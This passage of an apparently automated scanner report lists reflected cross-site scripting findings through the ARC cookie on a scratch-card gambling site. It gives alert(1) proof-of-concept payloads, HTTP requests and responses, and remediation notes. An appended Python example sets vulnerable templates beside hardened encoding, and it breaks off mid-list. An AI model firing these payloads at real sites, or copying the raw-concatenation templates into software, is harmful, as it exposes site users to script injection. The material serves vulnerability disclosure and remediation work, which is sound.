The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"%3balert(1)//a08662a17ad was submitted in the ARC cookie. This input was echoed as f815d";alert(1)//a08662a17ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f815d"%3balert(1)//a08662a17ad; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f815d%22%3Balert%281%29%2F%2Fa08662a17ad; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f815d";alert(1)//a08662a17ad' border='0' width='1' height='1'>
...[SNIP]...

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 63c7a--><script>alert(1)</script>78f7646a362 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013763c7a--><script>alert(1)</script>78f7646a362; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013763c7a%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E78f7646a362; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013763c7a--><script>alert(1)</script>78f7646a362">
...[SNIP]...

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bef4'%3balert(1)//6be503d7a62 was submitted in the ARC cookie. This input was echoed as 5bef4';alert(1)//6be503d7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301375bef4'%3balert(1)//6be503d7a62; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301375bef4%27%3Balert%281%29%2F%2F6be503d7a62; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301375bef4';alert(1)//6be503d7a62&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f253"%3balert(1)//b5a37874c72 was submitted in the ARC cookie. This input was echoed as 4f253";alert(1)//b5a37874c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374f253"%3balert(1)//b5a37874c72; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374f253%22%3Balert%281%29%2F%2Fb5a37874c72; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374f253";alert(1)//b5a37874c72' border='0' width='1' height='1'>
...[SNIP]...

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f04e'%3balert(1)//09abbe83f8b was submitted in the ARC cookie. This input was echoed as 6f04e';alert(1)//09abbe83f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376f04e'%3balert(1)//09abbe83f8b; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301376f04e%27%3Balert%281%29%2F%2F09abbe83f8b; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301376f04e';alert(1)//09abbe83f8b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4836b--><script>alert(1)</script>825bfb200be was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374836b--><script>alert(1)</script>825bfb200be; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374836b%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E825bfb200be; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374836b--><script>alert(1)</script>825bfb200be">
...[SNIP]...

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8db1"%3balert(1)//e159452f354 was submitted in the ARC cookie. This input was echoed as a8db1";alert(1)//e159452f354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a8db1"%3balert(1)//e159452f354; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137a8db1%22%3Balert%281%29%2F%2Fe159452f354; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a8db1";alert(1)//e159452f354' border='0' width='1' height='1'>
...[SNIP]...

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 792f9--><script>alert(1)</script>6e1becf961c was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137792f9--><script>alert(1)</script>6e1becf961c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137792f9%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e1becf961c; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137792f9--><script>alert(1)</script>6e1becf961c">
...[SNIP]...

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18010'%3balert(1)//6d6871f8cf2 was submitted in the ARC cookie. This input was echoed as 18010';alert(1)//6d6871f8cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013718010'%3balert(1)//6d6871f8cf2; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013718010%27%3Balert%281%29%2F%2F6d6871f8cf2; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013718010';alert(1)//6d6871f8cf2&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d8c'%3balert(1)//103ff68b225 was submitted in the ARC cookie. This input was echoed as c2d8c';alert(1)//103ff68b225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c2d8c'%3balert(1)//103ff68b225; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c2d8c%27%3Balert%281%29%2F%2F103ff68b225; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c2d8c';alert(1)//103ff68b225&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f1a"%3balert(1)//c43ea638988 was submitted in the ARC cookie. This input was echoed as f5f1a";alert(1)//c43ea638988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f5f1a"%3balert(1)//c43ea638988; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f5f1a%22%3Balert%281%29%2F%2Fc43ea638988; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f5f1a";alert(1)//c43ea638988' border='0' width='1' height='1'>
...[SNIP]...

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bdc95--><script>alert(1)</script>eea9fa94cc6 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bdc95--><script>alert(1)</script>eea9fa94cc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bdc95%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea9fa94cc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bdc95--><script>alert(1)</script>eea9fa94cc6">
...[SNIP]...

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59f27"%3balert(1)//e1dbe20273c was submitted in the ARC cookie. This input was echoed as 59f27";alert(1)//e1dbe20273c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
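
Context-specific output encoding for the three reflection shapes excerpted in this section, as an added example (Python, written for this edit; the site runs classic ASP and this is not its code): the window.open URL, the tracking-pixel img URL and the hidden-input value are reproduced as string templates, once concatenating the cookie value raw as the excerpts show and once hardened. The hardened versions percent-encode the value where it is a URL parameter, then encode for the enclosing JS-string or attribute context, and an allow-list check rejects anything that does not look like a cookie value before it is used at all. The ARC_RE pattern and the hardened_comment wrapper are assumptions; the report does not document the legitimate format of ARC.

```python
import html
import json
import re
from urllib.parse import quote

# Payloads copied from the Issue detail entries of this report.
SINGLE_QUOTE_PAYLOAD = "130137497bd';alert(1)//15e5732e970"
DOUBLE_QUOTE_PAYLOAD = '13013759f27";alert(1)//e1dbe20273c'
COMMENT_PAYLOAD = "130137bdc95--><script>alert(1)</script>eea9fa94cc6"

LOBBY = "https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR="
PIXEL = "http://trk.primescratchcards.com/?ac=99&brandId=5143&AR="


# --- vulnerable shapes: the ARC cookie value is concatenated raw, as in the excerpts

def vulnerable_lobby_script(ar):
    """JS single-quoted string literal inside window.open()."""
    return "window.open('" + LOBBY + ar + "&AFI=3','game')"


def vulnerable_hidden_input(ar):
    """Double-quoted HTML attribute value."""
    return '<input type=hidden name ="AR" value ="' + ar + '">'


def vulnerable_pixel(ar):
    """Tracking-pixel URL inside a single-quoted src attribute."""
    return "<img src='" + PIXEL + ar + "' border='0' width='1' height='1'>"


# --- hardened shapes: encode for the innermost context first, the enclosing one last

def hardened_lobby_script(ar):
    # The value is a URL query parameter: percent-encode it (safe="" so even "/"
    # becomes %2F), then emit the whole URL as a JSON string literal so the JS
    # parser sees exactly one string whatever the parameter contained.
    url = LOBBY + quote(ar, safe="") + "&AFI=3"
    return "window.open(" + json.dumps(url) + ",'game')"


def hardened_hidden_input(ar):
    # Attribute context: escape & < > and both quote characters.
    return '<input type="hidden" name="AR" value="' + html.escape(ar, quote=True) + '">'


def hardened_pixel(ar):
    # URL parameter inside an attribute: percent-encode for the URL, then
    # attribute-encode the whole URL (which also turns "&" into "&amp;").
    url = html.escape(PIXEL + quote(ar, safe=""), quote=True)
    return "<img src='" + url + "' border='0' width='1' height='1'>"


def hardened_comment(ar):
    # Comment context (the "copied into an HTML comment" entries). The HTML
    # parser ends a comment at "-->", and entities are not decoded inside one,
    # so escaping ">" is what actually stops the closer; "--" runs are split as
    # well because SGML-style parsers treat "--" as a comment delimiter. Better
    # still is not to echo user data into comments. (Assumed wrapper.)
    return "<!-- ARC=" + re.sub(r"-(?=-)", "- ", html.escape(ar, quote=True)) + " -->"


# --- allow-listing: reject anything that does not look like a cookie value first
# The benign values in this report are short alphanumerics; the exact legitimate
# format is not documented, so this pattern is an assumption for the example.
ARC_RE = re.compile(r"[A-Za-z0-9]{1,32}")


def is_valid_arc(ar):
    return ARC_RE.fullmatch(ar) is not None


# --- the report's own confirmation criterion: the breakout token is echoed unmodified

def reflects_unmodified(rendered, breakout):
    return breakout in rendered


if __name__ == "__main__":
    cases = [
        (vulnerable_lobby_script, hardened_lobby_script, SINGLE_QUOTE_PAYLOAD, "';alert(1)//"),
        (vulnerable_hidden_input, hardened_hidden_input, COMMENT_PAYLOAD, "--><script>"),
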